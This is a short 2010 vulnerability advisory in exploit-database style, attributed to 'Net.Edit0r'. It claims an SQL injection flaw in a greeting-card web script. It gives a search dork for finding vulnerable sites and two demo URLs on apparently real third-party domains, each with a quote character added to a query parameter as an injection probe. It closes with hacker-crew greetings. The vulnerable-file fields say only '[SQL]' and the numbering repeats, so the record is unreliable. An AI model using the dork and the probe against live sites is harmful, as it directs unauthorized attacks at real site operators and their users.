# Title : Grering card SQL Injection Vulnerability # Author : Net.Edit0r # Data : 2010-06-21 # Location : Iran # Dork : "Send amazing greetings to your friends and relative!" # Category : webapps [~]######################################### InformatioN #############################################[~] [~] Title : Grering card SQL Injection Vulnerability [~] Author : Net.Edit0r [~] Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com [~]######################################### ExploiT #############################################[~] [~] 1. Vulnerable File :[SQL] [~] 2. Vulnerable File :[SQL] [~] 3. Vulnerable File :[SQL] [~] 3. Demo : http://ecardworld.net/search.php?CategoryID=15&SubcategoryID=60' http://www.cutegreetingscard.com/search.php?CategoryID=6' [~]######################################### ThankS To ... ############################################[~] [~] Special Thanks To My Best FriendS : NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ , ~~XTerror~~ , __l2o5v4__ , _Attack_ [~] IRANIAN Young HackerZ [~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR [~]######################################### FinisH :D #############################################[~]